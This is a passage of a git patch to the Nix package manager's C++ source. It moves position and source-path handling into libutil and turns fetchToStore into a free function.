two or more consecutive stack frames originate from the same file). --- src/libcmd/editor-for.cc | 1 + src/libcmd/editor-for.hh | 2 +- src/libcmd/installable-value.cc | 3 +- src/libcmd/repl.cc | 2 +- src/libexpr/eval.cc | 9 +- src/libexpr/eval.hh | 2 +- src/libexpr/nixexpr.cc | 63 ------- src/libexpr/nixexpr.hh | 26 +-- src/libexpr/primops.cc | 3 +- src/libexpr/value.hh | 1 + src/libfetchers/fetch-to-store.cc | 68 ++++++++ src/libfetchers/fetch-to-store.hh | 22 +++ src/libfetchers/fetchers.cc | 4 +- src/libfetchers/filtering-input-accessor.hh | 1 + src/libfetchers/fs-input-accessor.hh | 1 + src/libfetchers/input-accessor.cc | 129 --------------- src/libfetchers/input-accessor.hh | 174 -------------------- src/libfetchers/memory-input-accessor.cc | 1 + src/libfetchers/memory-input-accessor.hh | 1 + src/libstore/store-api.hh | 1 + src/libutil/error.cc | 55 +------ src/libutil/error.hh | 42 +---- src/libutil/input-accessor.hh | 27 +++ src/libutil/logging.cc | 6 +- src/libutil/position.cc | 112 +++++++++++++ src/libutil/position.hh | 74 +++++++++ src/libutil/ref.hh | 1 + src/{libstore => libutil}/repair-flag.hh | 0 src/libutil/source-path.cc | 105 ++++++++++++ src/libutil/source-path.hh | 114 +++++++++++++ 30 files changed, 561 insertions(+), 489 deletions(-) create mode 100644 src/libfetchers/fetch-to-store.cc create mode 100644 src/libfetchers/fetch-to-store.hh delete mode 100644 src/libfetchers/input-accessor.cc delete mode 100644 src/libfetchers/input-accessor.hh create mode 100644 src/libutil/input-accessor.hh create mode 100644 src/libutil/position.cc create mode 100644 src/libutil/position.hh rename src/{libstore => libutil}/repair-flag.hh (100%) create mode 100644 src/libutil/source-path.cc create mode 100644 src/libutil/source-path.hh diff --git a/src/libcmd/editor-for.cc b/src/libcmd/editor-for.cc index 619d3673f..67653d9c9 100644 --- a/src/libcmd/editor-for.cc +++ b/src/libcmd/editor-for.cc @@ -1,5 +1,6 @@ #include "editor-for.hh" #include "environment-variables.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libcmd/editor-for.hh b/src/libcmd/editor-for.hh index fbf4307c9..8acd7011e 100644 --- a/src/libcmd/editor-for.hh +++ b/src/libcmd/editor-for.hh @@ -2,7 +2,7 @@ ///@file #include "types.hh" -#include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libcmd/installable-value.cc b/src/libcmd/installable-value.cc index bdc34bbe3..c8a3e1b21 100644 --- a/src/libcmd/installable-value.cc +++ b/src/libcmd/installable-value.cc @@ -1,5 +1,6 @@ #include "installable-value.hh" #include "eval-cache.hh" +#include "fetch-to-store.hh" namespace nix { @@ -44,7 +45,7 @@ ref InstallableValue::require(ref installable) std::optional InstallableValue::trySinglePathToDerivedPaths(Value & v, const PosIdx pos, std::string_view errorCtx) { if (v.type() == nPath) { - auto storePath = v.path().fetchToStore(*state->store); + auto storePath = fetchToStore(*state->store, v.path()); return {{ .path = DerivedPath::Opaque { .path = std::move(storePath), diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index dea91ba63..78c4538b2 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -221,7 +221,7 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi // prefer direct pos, but if noPos then try the expr. auto pos = dt.pos ? dt.pos - : static_cast>(positions[dt.expr.getPos() ? dt.expr.getPos() : noPos]); + : positions[dt.expr.getPos() ? dt.expr.getPos() : noPos]; if (pos) { out << pos; diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 31f2d4952..d408f1adc 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -19,6 +19,7 @@ #include "signals.hh" #include "gc-small-vector.hh" #include "url.hh" +#include "fetch-to-store.hh" #include #include @@ -870,7 +871,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & ? std::make_unique( *this, DebugTrace { - .pos = error->info().errPos ? error->info().errPos : static_cast>(positions[expr.getPos()]), + .pos = error->info().errPos ? error->info().errPos : positions[expr.getPos()], .expr = expr, .env = env, .hint = error->info().msg, @@ -909,7 +910,7 @@ static std::unique_ptr makeDebugTraceStacker( EvalState & state, Expr & expr, Env & env, - std::shared_ptr && pos, + std::shared_ptr && pos, const char * s, const std::string & s2) { @@ -1187,7 +1188,7 @@ void EvalState::evalFile(const SourcePath & path, Value & v, bool mustBeTrivial) *this, *e, this->baseEnv, - e->getPos() ? static_cast>(positions[e->getPos()]) : nullptr, + e->getPos() ? std::make_shared(positions[e->getPos()]) : nullptr, "while evaluating the file '%1%':", resolvedPath.to_string()) : nullptr; @@ -2368,7 +2369,7 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat auto dstPath = i != srcToStore.end() ? i->second : [&]() { - auto dstPath = path.fetchToStore(*store, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); + auto dstPath = fetchToStore(*store, path, path.baseName(), FileIngestionMethod::Recursive, nullptr, repair); allowPath(dstPath); srcToStore.insert_or_assign(path, dstPath); printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath)); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 6e3f08d55..5e0f1886d 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -142,7 +142,7 @@ struct RegexCache; std::shared_ptr makeRegexCache(); struct DebugTrace { - std::shared_ptr pos; + std::shared_ptr pos; const Expr & expr; const Env & env; hintformat hint; diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index ede070cff..964de6351 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -11,58 +11,6 @@ namespace nix { ExprBlackHole eBlackHole; -struct PosAdapter : AbstractPos -{ - Pos::Origin origin; - - PosAdapter(Pos::Origin origin) - : origin(std::move(origin)) - { - } - - std::optional getSource() const override - { - return std::visit(overloaded { - [](const Pos::none_tag &) -> std::optional { - return std::nullopt; - }, - [](const Pos::Stdin & s) -> std::optional { - // Get rid of the null terminators added by the parser. - return std::string(s.source->c_str()); - }, - [](const Pos::String & s) -> std::optional { - // Get rid of the null terminators added by the parser. - return std::string(s.source->c_str()); - }, - [](const SourcePath & path) -> std::optional { - try { - return path.readFile(); - } catch (Error &) { - return std::nullopt; - } - } - }, origin); - } - - void print(std::ostream & out) const override - { - std::visit(overloaded { - [&](const Pos::none_tag &) { out << "«none»"; }, - [&](const Pos::Stdin &) { out << "«stdin»"; }, - [&](const Pos::String & s) { out << "«string»"; }, - [&](const SourcePath & path) { out << path; } - }, origin); - } -}; - -Pos::operator std::shared_ptr() const -{ - auto pos = std::make_shared(origin); - pos->line = line; - pos->column = column; - return pos; -} - // FIXME: remove, because *symbols* are abstract and do not have a single // textual representation; see printIdentifier() std::ostream & operator <<(std::ostream & str, const SymbolStr & symbol) @@ -268,17 +216,6 @@ void ExprPos::show(const SymbolTable & symbols, std::ostream & str) const } -std::ostream & operator << (std::ostream & str, const Pos & pos) -{ - if (auto pos2 = (std::shared_ptr) pos) { - str << *pos2; - } else - str << "undefined position"; - - return str; -} - - std::string showAttrPath(const SymbolTable & symbols, const AttrPath & attrPath) { std::ostringstream out; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 71ed9ef30..3cd46ca27 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -8,6 +8,7 @@ #include "symbol-table.hh" #include "error.hh" #include "chunked-vector.hh" +#include "position.hh" namespace nix { @@ -28,27 +29,6 @@ public: using EvalError::EvalError; }; -/** - * Position objects. - */ -struct Pos -{ - uint32_t line; - uint32_t column; - - struct none_tag { }; - struct Stdin { ref source; }; - struct String { ref source; }; - - typedef std::variant Origin; - - Origin origin; - - explicit operator bool() const { return line > 0; } - - operator std::shared_ptr() const; -}; - class PosIdx { friend class PosTable; @@ -81,7 +61,7 @@ public: mutable uint32_t idx = std::numeric_limits::max(); // Used for searching in PosTable::[]. - explicit Origin(uint32_t idx): idx(idx), origin{Pos::none_tag()} {} + explicit Origin(uint32_t idx): idx(idx), origin{std::monostate()} {} public: const Pos::Origin origin; @@ -132,8 +112,6 @@ public: inline PosIdx noPos = {}; -std::ostream & operator << (std::ostream & str, const Pos & pos); - struct Env; struct Value; diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index b2ffcc051..ee07e5568 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -16,6 +16,7 @@ #include "value-to-xml.hh" #include "primops.hh" #include "fs-input-accessor.hh" +#include "fetch-to-store.hh" #include #include @@ -2240,7 +2241,7 @@ static void addPath( }); if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) { - auto dstPath = path.fetchToStore(*state.store, name, method, filter.get(), state.repair); + auto dstPath = fetchToStore(*state.store, path, name, method, filter.get(), state.repair); if (expectedHash && expectedStorePath != dstPath) state.debugThrowLastTrace(Error("store path mismatch in (possibly filtered) path added from '%s'", path)); state.allowAndSetStorePathString(dstPath, v); diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index d9860e921..c65b336b0 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -8,6 +8,7 @@ #include "symbol-table.hh" #include "value/context.hh" #include "input-accessor.hh" +#include "source-path.hh" #if HAVE_BOEHMGC #include diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc new file mode 100644 index 000000000..196489e05 --- /dev/null +++ b/src/libfetchers/fetch-to-store.cc @@ -0,0 +1,68 @@ +#include "fetch-to-store.hh" +#include "fetchers.hh" +#include "cache.hh" + +namespace nix { + +StorePath fetchToStore( + Store & store, + const SourcePath & path, + std::string_view name, + ContentAddressMethod method, + PathFilter * filter, + RepairFlag repair) +{ + // FIXME: add an optimisation for the case where the accessor is + // an FSInputAccessor pointing to a store path. + + std::optional cacheKey; + + if (!filter && path.accessor->fingerprint) { + cacheKey = fetchers::Attrs{ + {"_what", "fetchToStore"}, + {"store", store.storeDir}, + {"name", std::string(name)}, + {"fingerprint", *path.accessor->fingerprint}, + { + "method", + std::visit(overloaded { + [](const TextIngestionMethod &) { + return "text"; + }, + [](const FileIngestionMethod & fim) { + switch (fim) { + case FileIngestionMethod::Flat: return "flat"; + case FileIngestionMethod::Recursive: return "nar"; + default: assert(false); + } + }, + }, method.raw), + }, + {"path", path.path.abs()} + }; + if (auto res = fetchers::getCache()->lookup(store, *cacheKey)) { + debug("store path cache hit for '%s'", path); + return res->second; + } + } else + debug("source path '%s' is uncacheable", path); + + Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", path)); + + auto filter2 = filter ? *filter : defaultPathFilter; + + auto storePath = + settings.readOnlyMode + ? store.computeStorePath( + name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2).first + : store.addToStore( + name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2, repair); + + if (cacheKey) + fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); + + return storePath; +} + + +} diff --git a/src/libfetchers/fetch-to-store.hh b/src/libfetchers/fetch-to-store.hh new file mode 100644 index 000000000..e5e039340 --- /dev/null +++ b/src/libfetchers/fetch-to-store.hh @@ -0,0 +1,22 @@ +#pragma once + +#include "source-path.hh" +#include "store-api.hh" +#include "file-system.hh" +#include "repair-flag.hh" +#include "file-content-address.hh" + +namespace nix { + +/** + * Copy the `path` to the Nix store. + */ +StorePath fetchToStore( + Store & store, + const SourcePath & path, + std::string_view name = "source", + ContentAddressMethod method = FileIngestionMethod::Recursive, + PathFilter * filter = nullptr, + RepairFlag repair = NoRepair); + +} diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc index f309e5993..7f282c972 100644 --- a/src/libfetchers/fetchers.cc +++ b/src/libfetchers/fetchers.cc @@ -1,6 +1,8 @@ #include "fetchers.hh" #include "store-api.hh" #include "input-accessor.hh" +#include "source-path.hh" +#include "fetch-to-store.hh" #include @@ -374,7 +376,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const std::pair InputScheme::fetch(ref store, const Input & input) { auto [accessor, input2] = getAccessor(store, input); - auto storePath = SourcePath(accessor).fetchToStore(*store, input2.getName()); + auto storePath = fetchToStore(*store, SourcePath(accessor), input2.getName()); return {storePath, input2}; } diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index e1b83c929..a352a33a6 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -1,6 +1,7 @@ #pragma once #include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libfetchers/fs-input-accessor.hh b/src/libfetchers/fs-input-accessor.hh index ba5af5887..a98e83511 100644 --- a/src/libfetchers/fs-input-accessor.hh +++ b/src/libfetchers/fs-input-accessor.hh @@ -1,6 +1,7 @@ #pragma once #include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libfetchers/input-accessor.cc b/src/libfetchers/input-accessor.cc deleted file mode 100644 index a647f5915..000000000 --- a/src/libfetchers/input-accessor.cc +++ /dev/null @@ -1,129 +0,0 @@ -#include "input-accessor.hh" -#include "store-api.hh" -#include "cache.hh" - -namespace nix { - -StorePath InputAccessor::fetchToStore( - Store & store, - const CanonPath & path, - std::string_view name, - ContentAddressMethod method, - PathFilter * filter, - RepairFlag repair) -{ - // FIXME: add an optimisation for the case where the accessor is - // an FSInputAccessor pointing to a store path. - - std::optional cacheKey; - - if (!filter && fingerprint) { - cacheKey = fetchers::Attrs{ - {"_what", "fetchToStore"}, - {"store", store.storeDir}, - {"name", std::string(name)}, - {"fingerprint", *fingerprint}, - { - "method", - std::visit(overloaded { - [](const TextIngestionMethod &) { - return "text"; - }, - [](const FileIngestionMethod & fim) { - switch (fim) { - case FileIngestionMethod::Flat: return "flat"; - case FileIngestionMethod::Recursive: return "nar"; - default: assert(false); - } - }, - }, method.raw), - }, - {"path", path.abs()} - }; - if (auto res = fetchers::getCache()->lookup(store, *cacheKey)) { - debug("store path cache hit for '%s'", showPath(path)); - return res->second; - } - } else - debug("source path '%s' is uncacheable", showPath(path)); - - Activity act(*logger, lvlChatty, actUnknown, fmt("copying '%s' to the store", showPath(path))); - - auto filter2 = filter ? *filter : defaultPathFilter; - - auto storePath = - settings.readOnlyMode - ? store.computeStorePath( - name, *this, path, method, HashAlgorithm::SHA256, {}, filter2).first - : store.addToStore( - name, *this, path, method, HashAlgorithm::SHA256, {}, filter2, repair); - - if (cacheKey) - fetchers::getCache()->add(store, *cacheKey, {}, storePath, true); - - return storePath; -} - -std::ostream & operator << (std::ostream & str, const SourcePath & path) -{ - str << path.to_string(); - return str; -} - -StorePath SourcePath::fetchToStore( - Store & store, - std::string_view name, - ContentAddressMethod method, - PathFilter * filter, - RepairFlag repair) const -{ - return accessor->fetchToStore(store, path, name, method, filter, repair); -} - -std::string_view SourcePath::baseName() const -{ - return path.baseName().value_or("source"); -} - -SourcePath SourcePath::parent() const -{ - auto p = path.parent(); - assert(p); - return {accessor, std::move(*p)}; -} - -SourcePath SourcePath::resolveSymlinks() const -{ - auto res = SourcePath(accessor); - - int linksAllowed = 1024; - - std::list todo; - for (auto & c : path) - todo.push_back(std::string(c)); - - while (!todo.empty()) { - auto c = *todo.begin(); - todo.pop_front(); - if (c == "" || c == ".") - ; - else if (c == "..") - res.path.pop(); - else { - res.path.push(c); - if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) { - if (!linksAllowed--) - throw Error("infinite symlink recursion in path '%s'", path); - auto target = res.readLink(); - res.path.pop(); - if (hasPrefix(target, "/")) - res.path = CanonPath::root; - todo.splice(todo.begin(), tokenizeString>(target, "/")); - } - } - } - - return res; -} - -} diff --git a/src/libfetchers/input-accessor.hh b/src/libfetchers/input-accessor.hh deleted file mode 100644 index d2a21cb4b..000000000 --- a/src/libfetchers/input-accessor.hh +++ /dev/null @@ -1,174 +0,0 @@ -#pragma once -///@file - -#include "source-accessor.hh" -#include "ref.hh" -#include "types.hh" -#include "file-system.hh" -#include "repair-flag.hh" -#include "content-address.hh" - -namespace nix { - -MakeError(RestrictedPathError, Error); - -struct SourcePath; -class StorePath; -class Store; - -struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this -{ - std::optional fingerprint; - - /** - * Return the maximum last-modified time of the files in this - * tree, if available. - */ - virtual std::optional getLastModified() - { - return std::nullopt; - } - - StorePath fetchToStore( - Store & store, - const CanonPath & path, - std::string_view name = "source", - ContentAddressMethod method = FileIngestionMethod::Recursive, - PathFilter * filter = nullptr, - RepairFlag repair = NoRepair); -}; - -/** - * An abstraction for accessing source files during - * evaluation. Currently, it's just a wrapper around `CanonPath` that - * accesses files in the regular filesystem, but in the future it will - * support fetching files in other ways. - */ -struct SourcePath -{ - ref accessor; - CanonPath path; - - SourcePath(ref accessor, CanonPath path = CanonPath::root) - : accessor(std::move(accessor)) - , path(std::move(path)) - { } - - std::string_view baseName() const; - - /** - * Construct the parent of this `SourcePath`. Aborts if `this` - * denotes the root. - */ - SourcePath parent() const; - - /** - * If this `SourcePath` denotes a regular file (not a symlink), - * return its contents; otherwise throw an error. - */ - std::string readFile() const - { return accessor->readFile(path); } - - /** - * Return whether this `SourcePath` denotes a file (of any type) - * that exists - */ - bool pathExists() const - { return accessor->pathExists(path); } - - /** - * Return stats about this `SourcePath`, or throw an exception if - * it doesn't exist. - */ - InputAccessor::Stat lstat() const - { return accessor->lstat(path); } - - /** - * Return stats about this `SourcePath`, or std::nullopt if it - * doesn't exist. - */ - std::optional maybeLstat() const - { return accessor->maybeLstat(path); } - - /** - * If this `SourcePath` denotes a directory (not a symlink), - * return its directory entries; otherwise throw an error. - */ - InputAccessor::DirEntries readDirectory() const - { return accessor->readDirectory(path); } - - /** - * If this `SourcePath` denotes a symlink, return its target; - * otherwise throw an error. - */ - std::string readLink() const - { return accessor->readLink(path); } - - /** - * Dump this `SourcePath` to `sink` as a NAR archive. - */ - void dumpPath( - Sink & sink, - PathFilter & filter = defaultPathFilter) const - { return accessor->dumpPath(path, sink, filter); } - - /** - * Copy this `SourcePath` to the Nix store. - */ - StorePath fetchToStore( - Store & store, - std::string_view name = "source", - ContentAddressMethod method = FileIngestionMethod::Recursive, - PathFilter * filter = nullptr, - RepairFlag repair = NoRepair) const; - - /** - * Return the location of this path in the "real" filesystem, if - * it has a physical location. - */ - std::optional getPhysicalPath() const - { return accessor->getPhysicalPath(path); } - - std::string to_string() const - { return accessor->showPath(path); } - - /** - * Append a `CanonPath` to this path. - */ - SourcePath operator + (const CanonPath & x) const - { return {accessor, path + x}; } - - /** - * Append a single component `c` to this path. `c` must not - * contain a slash. A slash is implicitly added between this path - * and `c`. - */ - SourcePath operator + (std::string_view c) const - { return {accessor, path + c}; } - - bool operator == (const SourcePath & x) const - { - return std::tie(accessor, path) == std::tie(x.accessor, x.path); - } - - bool operator != (const SourcePath & x) const - { - return std::tie(accessor, path) != std::tie(x.accessor, x.path); - } - - bool operator < (const SourcePath & x) const - { - return std::tie(accessor, path) < std::tie(x.accessor, x.path); - } - - /** - * Resolve any symlinks in this `SourcePath` (including its - * parents). The result is a `SourcePath` in which no element is a - * symlink. - */ - SourcePath resolveSymlinks() const; -}; - -std::ostream & operator << (std::ostream & str, const SourcePath & path); - -} diff --git a/src/libfetchers/memory-input-accessor.cc b/src/libfetchers/memory-input-accessor.cc index 057f3e37f..88a2e34e8 100644 --- a/src/libfetchers/memory-input-accessor.cc +++ b/src/libfetchers/memory-input-accessor.cc @@ -1,5 +1,6 @@ #include "memory-input-accessor.hh" #include "memory-source-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libfetchers/memory-input-accessor.hh b/src/libfetchers/memory-input-accessor.hh index b75b02bfd..508b07722 100644 --- a/src/libfetchers/memory-input-accessor.hh +++ b/src/libfetchers/memory-input-accessor.hh @@ -1,4 +1,5 @@ #include "input-accessor.hh" +#include "source-path.hh" namespace nix { diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 96a7ebd7b..9667b5e9e 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -13,6 +13,7 @@ #include "path-info.hh" #include "repair-flag.hh" #include "store-dir-config.hh" +#include "source-path.hh" #include #include diff --git a/src/libutil/error.cc b/src/libutil/error.cc index e42925c2b..bd2f6b840 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -2,6 +2,7 @@ #include "environment-variables.hh" #include "signals.hh" #include "terminal.hh" +#include "position.hh" #include #include @@ -10,7 +11,7 @@ namespace nix { -void BaseError::addTrace(std::shared_ptr && e, hintformat hint, bool frame) +void BaseError::addTrace(std::shared_ptr && e, hintformat hint, bool frame) { err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame }); } @@ -41,15 +42,6 @@ std::ostream & operator <<(std::ostream & os, const hintformat & hf) return os << hf.str(); } -std::ostream & operator <<(std::ostream & str, const AbstractPos & pos) -{ - pos.print(str); - str << ":" << pos.line; - if (pos.column > 0) - str << ":" << pos.column; - return str; -} - /** * An arbitrarily defined value comparison for the purpose of using traces in the key of a sorted container. */ @@ -76,49 +68,10 @@ inline bool operator> (const Trace& lhs, const Trace& rhs) { return rhs < lhs; } inline bool operator<=(const Trace& lhs, const Trace& rhs) { return !(lhs > rhs); } inline bool operator>=(const Trace& lhs, const Trace& rhs) { return !(lhs < rhs); } -std::optional AbstractPos::getCodeLines() const -{ - if (line == 0) - return std::nullopt; - - if (auto source = getSource()) { - - std::istringstream iss(*source); - // count the newlines. - int count = 0; - std::string curLine; - int pl = line - 1; - - LinesOfCode loc; - - do { - std::getline(iss, curLine); - ++count; - if (count < pl) - ; - else if (count == pl) { - loc.prevLineOfCode = curLine; - } else if (count == pl + 1) { - loc.errLineOfCode = curLine; - } else if (count == pl + 2) { - loc.nextLineOfCode = curLine; - break; - } - - if (!iss.good()) - break; - } while (true); - - return loc; - } - - return std::nullopt; -} - // print lines of code to the ostream, indicating the error column. void printCodeLines(std::ostream & out, const std::string & prefix, - const AbstractPos & errPos, + const Pos & errPos, const LinesOfCode & loc) { // previous line of code. @@ -196,7 +149,7 @@ static bool printUnknownLocations = getEnv("_NIX_EVAL_SHOW_UNKNOWN_LOCATIONS").h * * @return true if a position was printed. */ -static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std::shared_ptr & pos) { +static bool printPosMaybe(std::ostream & oss, std::string_view indent, const std::shared_ptr & pos) { bool hasPos = pos && *pos; if (hasPos) { oss << indent << ANSI_BLUE << "at " ANSI_WARNING << *pos << ANSI_NORMAL << ":"; diff --git a/src/libutil/error.hh b/src/libutil/error.hh index baffca128..234cbe1f6 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -63,45 +63,15 @@ struct LinesOfCode { std::optional nextLineOfCode; }; -/** - * An abstract type that represents a location in a source file. - */ -struct AbstractPos -{ - uint32_t line = 0; - uint32_t column = 0; - - /** - * An AbstractPos may be a "null object", representing an unknown position. - * - * Return true if this position is known. - */ - inline operator bool() const { return line != 0; }; - - /** - * Return the contents of the source file. - */ - virtual std::optional getSource() const - { return std::nullopt; }; - - virtual void print(std::ostream & out) const = 0; - - std::optional getCodeLines() const; - - virtual ~AbstractPos() = default; - - inline auto operator<=>(const AbstractPos& rhs) const = default; -}; - -std::ostream & operator << (std::ostream & str, const AbstractPos & pos); +struct Pos; void printCodeLines(std::ostream & out, const std::string & prefix, - const AbstractPos & errPos, + const Pos & errPos, const LinesOfCode & loc); struct Trace { - std::shared_ptr pos; + std::shared_ptr pos; hintformat hint; bool frame; }; @@ -114,7 +84,7 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; hintformat msg; - std::shared_ptr errPos; + std::shared_ptr errPos; std::list traces; Suggestions suggestions; @@ -185,12 +155,12 @@ public: } template - void addTrace(std::shared_ptr && e, std::string_view fs, const Args & ... args) + void addTrace(std::shared_ptr && e, std::string_view fs, const Args & ... args) { addTrace(std::move(e), hintfmt(std::string(fs), args...)); } - void addTrace(std::shared_ptr && e, hintformat hint, bool frame = false); + void addTrace(std::shared_ptr && e, hintformat hint, bool frame = false); bool hasTrace() const { return !err.traces.empty(); } diff --git a/src/libutil/input-accessor.hh b/src/libutil/input-accessor.hh new file mode 100644 index 000000000..55b7c2f2f --- /dev/null +++ b/src/libutil/input-accessor.hh @@ -0,0 +1,27 @@ +#pragma once +///@file + +#include "source-accessor.hh" +#include "ref.hh" +#include "repair-flag.hh" + +namespace nix { + +MakeError(RestrictedPathError, Error); + +struct InputAccessor : virtual SourceAccessor, std::enable_shared_from_this +{ + std::optional fingerprint; + + /** + * Return the maximum last-modified time of the files in this + * tree, if available. + */ + virtual std::optional getLastModified() + { + return std::nullopt; + } + +}; + +} diff --git a/src/libutil/logging.cc b/src/libutil/logging.cc index 60b0865bf..183aee2dc 100644 --- a/src/libutil/logging.cc +++ b/src/libutil/logging.cc @@ -4,6 +4,8 @@ #include "terminal.hh" #include "util.hh" #include "config.hh" +#include "source-path.hh" +#include "position.hh" #include #include @@ -136,13 +138,13 @@ Activity::Activity(Logger & logger, Verbosity lvl, ActivityType type, logger.startActivity(id, lvl, type, s, fields, parent); } -void to_json(nlohmann::json & json, std::shared_ptr pos) +void to_json(nlohmann::json & json, std::shared_ptr pos) { if (pos) { json["line"] = pos->line; json["column"] = pos->column; std::ostringstream str; - pos->print(str); + pos->print(str, true); json["file"] = str.str(); } else { json["line"] = nullptr; diff --git a/src/libutil/position.cc b/src/libutil/position.cc new file mode 100644 index 000000000..b39a5a1d4 --- /dev/null +++ b/src/libutil/position.cc @@ -0,0 +1,112 @@ +#include "position.hh" + +namespace nix { + +Pos::Pos(const Pos * other) +{ + if (!other) { + return; + } + line = other->line; + column = other->column; + origin = std::move(other->origin); +} + +Pos::operator std::shared_ptr() const +{ + return std::make_shared(&*this); +} + +bool Pos::operator<(const Pos &rhs) const +{ + return std::forward_as_tuple(line, column, origin) + < std::forward_as_tuple(rhs.line, rhs.column, rhs.origin); +} + +std::optional Pos::getCodeLines() const +{ + if (line == 0) + return std::nullopt; + + if (auto source = getSource()) { + + std::istringstream iss(*source); + // count the newlines. + int count = 0; + std::string curLine; + int pl = line - 1; + + LinesOfCode loc; + + do { + std::getline(iss, curLine); + ++count; + if (count < pl) + ; + else if (count == pl) { + loc.prevLineOfCode = curLine; + } else if (count == pl + 1) { + loc.errLineOfCode = curLine; + } else if (count == pl + 2) { + loc.nextLineOfCode = curLine; + break; + } + + if (!iss.good()) + break; + } while (true); + + return loc; + } + + return std::nullopt; +} + + +std::optional Pos::getSource() const +{ + return std::visit(overloaded { + [](const std::monostate &) -> std::optional { + return std::nullopt; + }, + [](const Pos::Stdin & s) -> std::optional { + // Get rid of the null terminators added by the parser. + return std::string(s.source->c_str()); + }, + [](const Pos::String & s) -> std::optional { + // Get rid of the null terminators added by the parser. + return std::string(s.source->c_str()); + }, + [](const SourcePath & path) -> std::optional { + try { + return path.readFile(); + } catch (Error &) { + return std::nullopt; + } + } + }, origin); +} + +void Pos::print(std::ostream & out, bool showOrigin) const +{ + if (showOrigin) { + std::visit(overloaded { + [&](const std::monostate &) { out << "«none»"; }, + [&](const Pos::Stdin &) { out << "«stdin»"; }, + [&](const Pos::String & s) { out << "«string»"; }, + [&](const SourcePath & path) { out << path; } + }, origin); + out << ":"; + } + out << line; + if (column > 0) + out << ":" << column; +} + +std::ostream & operator<<(std::ostream & str, const Pos & pos) +{ + pos.print(str, true); + return str; +} + +} diff --git a/src/libutil/position.hh b/src/libutil/position.hh new file mode 100644 index 000000000..a184997ed --- /dev/null +++ b/src/libutil/position.hh @@ -0,0 +1,74 @@ +#pragma once +/** + * @file + * + * @brief Pos and AbstractPos + */ + +#include +#include + +#include "source-path.hh" + +namespace nix { + +/** + * A position and an origin for that position (like a source file). + */ +struct Pos +{ + uint32_t line = 0; + uint32_t column = 0; + + struct Stdin { + ref source; + bool operator==(const Stdin & rhs) const + { return *source == *rhs.source; } + bool operator!=(const Stdin & rhs) const + { return *source != *rhs.source; } + bool operator<(const Stdin & rhs) const + { return *source < *rhs.source; } + }; + struct String { + ref source; + bool operator==(const String & rhs) const + { return *source == *rhs.source; } + bool operator!=(const String & rhs) const + { return *source != *rhs.source; } + bool operator<(const String & rhs) const + { return *source < *rhs.source; } + }; + + typedef std::variant Origin; + + Origin origin = std::monostate(); + + Pos() { } + Pos(uint32_t line, uint32_t column, Origin origin) + : line(line), column(column), origin(origin) { } + Pos(Pos & other) = default; + Pos(const Pos & other) = default; + Pos(Pos && other) = default; + Pos(const Pos * other); + + explicit operator bool() const { return line > 0; } + + operator std::shared_ptr() const; + + /** + * Return the contents of the source file. + */ + std::optional getSource() const; + + void print(std::ostream & out, bool showOrigin) const; + + std::optional getCodeLines() const; + + bool operator==(const Pos & rhs) const = default; + bool operator!=(const Pos & rhs) const = default; + bool operator<(const Pos & rhs) const; +}; + +std::ostream & operator<<(std::ostream & str, const Pos & pos); + +} diff --git a/src/libutil/ref.hh b/src/libutil/ref.hh index af5f8304c..5d0c3696d 100644 --- a/src/libutil/ref.hh +++ b/src/libutil/ref.hh @@ -1,6 +1,7 @@ #pragma once ///@file +#include #include #include #include diff --git a/src/libstore/repair-flag.hh b/src/libutil/repair-flag.hh similarity index 100% rename from src/libstore/repair-flag.hh rename to src/libutil/repair-flag.hh diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc new file mode 100644 index 000000000..d85b0b7fe --- /dev/null +++ b/src/libutil/source-path.cc @@ -0,0 +1,105 @@ +#include "source-path.hh" + +namespace nix { + +std::string_view SourcePath::baseName() const +{ return path.baseName().value_or("source"); } + 